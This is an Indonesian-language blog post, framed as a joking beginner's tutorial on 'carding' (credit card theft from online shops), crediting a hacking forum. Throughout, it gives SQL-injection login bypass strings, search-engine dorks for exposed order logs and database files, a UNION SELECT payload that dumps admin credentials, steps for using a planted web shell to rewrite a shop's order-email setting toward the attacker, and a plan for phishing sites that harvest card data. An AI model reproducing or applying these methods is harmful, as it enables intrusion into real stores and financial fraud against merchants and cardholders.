CARDING

20 Juni 2009 at 10:16 (Tak Berkategori)

Saatnya pake “Topi Hitam”…………….

Pasti dah pada tau kan apa itu CARDING. Seorang Newbie pasti tertarik melakukannya, termasuk saya. Aihaiahiahiaha. Klo masih ada yang belum tau tentang CARDING, silahkan ketik di kotak amal google.
Tips, Trik, Tutor, terserah kalian mau namain apa. Intinya saya cuma mau berbagi pengalaman(baca:lowEXPERIENCE).
Okeh…

Cukup bacotannya!!! Kita mulai dengan dakwah-nya»»»

1. Pake User & Password Admin Default —- SQL Injection Basic

ෟ Nih teknik manfaatin kelemahan dari SQL Injection String Login, caranya cukup mudah(mpe’ Newbie kaya saya bisa praktekin), dengan memasukkan code di bawah pada user dan password padalogin di website store admin.
Nih code user & pass-nya»»»
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb
CONTOH»»
Silakan masukin keyword» “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
CONTOH TARGET»»

http://www.namasitus.com/shop/admin/adminshop.asp

Masukkan kombinasi2 password yang telah disebut di atas…….

2. Shopping Order Log \ Info Log Order di Server

͛ Informasi ini juga susah2gampang(baca:susahnya ada 2, gampangnya cuman 1) didapatkan, tapi nggak semua ‘shopping website’ punya lubang/’hole’ kayak gini, balek ke otak kita ato hoki…. AHIAHIahiahiaIHAihaihai……. Kebanyakan file log yang tersimpan dalam sebuah website berformat *.log, *.rtf, *.txt, *.xls, dsb. Gimana cara nemuin log orderan-nya?? Imajinasi kita diuji !!!
CONTOH TARGET»»

http://www.namasitus.net/shop/admin/log/order.log

http://www.namasitus.la/shopping/DCShop/orders/orders.txt

http://www.namasitus.org/shop/order.cgi?dir=./order/order.log

Selamat Berimajinasi………….

3. Database Information – Database Source Location – Database Path

ɖ  Dari namanya aj dah susah!!!!! Sante bro, kotak amal google buka 24jam. Di bagian ini, kita dapet info lokasi database. Jadi kita bisa mendownload database yang ada di server. Mayoritas yang include di server .mdb.
CONTOH»»
Monggo diCOpas(read:COpy paste) di kotak amal google dengan keyword»”*.mdb” or “order.mdb” or “database.mdb”
Ato mo pake info DataBase: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb\
CONTOH TARGET»»

http://www.namasitus.org//cgi-bin/eshop/database/order.mdb

http://www.namasitus.com/fpdb/shop.mdb

http://www.namasitus.com/shopping/data/vsproducts.mdb

http://www.namasitus.com/shop/shopadmin/database.mdb

Plototin Monitor, sob!!! AIahiahiahiahiaha….& Siapin jus wortel + rokok, biar minus nggak nambah!!!! AWKawkawkkwa…..

4. SQL Injection Advanced Shop Vulnreability

ϙ Pusing lagi liat judulnya?! Dah ada caranya tuh di Tutor nomer 3. Di tutor no.4 ini bakal dijelasin tentang SQL Injection dan sedikit kombinasi: join, union, select, update, dll. Ayo bareng2 blajar SQL Injection, sbelom praktekin nih tutor…
CONTOH»»
Monggo diCOpas ke kotak amal google»“product_details.php?item_id=” or “products_rss.php” dsb

http://www.targetweb.com/shop/product_details.php?item_id=13

GANTI TULISAN DENGAN»»
products_rss.php?category_id=1′ UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*

Klo ada yang error, mesin bakal bacot kayak gini»»
DB ERROR 1064

We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1

Klo dah slese jgn lupa decrypt pass-nya……….Wuookehh??? Sedia AerPuteh+Obat sakit KPALA!!

5. Admin Shop Send Mail Order

ϙ Dah mule pusing yak??? SAMA!!!!! Sante lagi bro, yang ini agak simpel. Fiuuuggghhhhh…
Pertama kita harus tau database admin-nya. Biasanya ada di config shop admin-nya.
CONTOH»»
Cari target inject di tempat Mbah Google, sampe DAPET!!! SAMPE BISA JALANIN c99 / rshell / backdoor lainya.
MISAL TARGET»»

http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php

TARRAAAmmm….dah masok tuh di shellnya dia. Cari config filenya SAMPE KTEMU» db.php, configuration.php, database.php, config.php, db.asp, dsb. Klo dah, buka file tsb sampe ktemu isi confignya, SPERTI»»
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Sekarang ganti bagian “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di config-nya ganti aj ma email kalian, MISAL KE»”var $ordermailsendto = ‘capekjuga@nulis.nya‘;”
WOKEEHH???? Tinggal kita tunggu di email, hasil order-nya. ManTAfFFfffFFFFFffFFF……

6. Phising & Scanning

ϙ Cara kayak gini bisa dibilang opsi iseng tapi tetep & masih berguna. Karna kita nggak ngotak-atik bahasa2 ribet. Kembali ke target-nya, berpengalaman transaksi pa enggak!!! Hahahahahaha….
Kita bikin situs fake, pura2 jualan apalah. Tapi sbenernya kita cuman ambil data2 CC dari sang target. Terlihat gampang? Klo yang ini bisa dibilang gampan2susah(baca:gampangnya ada 2, susahnya cuman 1). Ada beberapa syarat-nya sob»»
–Kita harus punya domain sendiri yang meyakinkan, maksudnya di halaman depan situs fake kita udah terdaftar trademark        website kita yang bakal bikin korban percaya bahwa site ini bneran, bukan SCAM. Coba klo di web-inject, bakalan runyam.
Inga’, kita harus download source lengkapnya untuk scam + phising. Tros, tancepin dah di serper kita. Masalah hasil, bisa kita tongkrongin email kita. Biasanya scam set kirimnya ke email sang owner web.

Slese juga sob….Semoga Bermanfaat…MajoTerosBuatSesamaNEWbie…VIVA LA N3uB1e…………
[Ask]Mau jadi Hitam ato Puteh?? Kaya-nya Jadi Hitam, Bangganya Jadi Puteh……WKakakakakak
Cuma Guyonan, Bro!!!!

BUAT ANAK2 BINUSHACKER, TERUTAMA bANG UtuH, THANKS ALOT BUAT TEORINYA…. YANG RIBET, EMANG LEBIH MAKNYUSSSSssssss…………

:::LazyBoi | Blakk[/]White | N3uB1e-, bin AdT bin CmK*09:::

Source: UtuH @ BINUSHACKER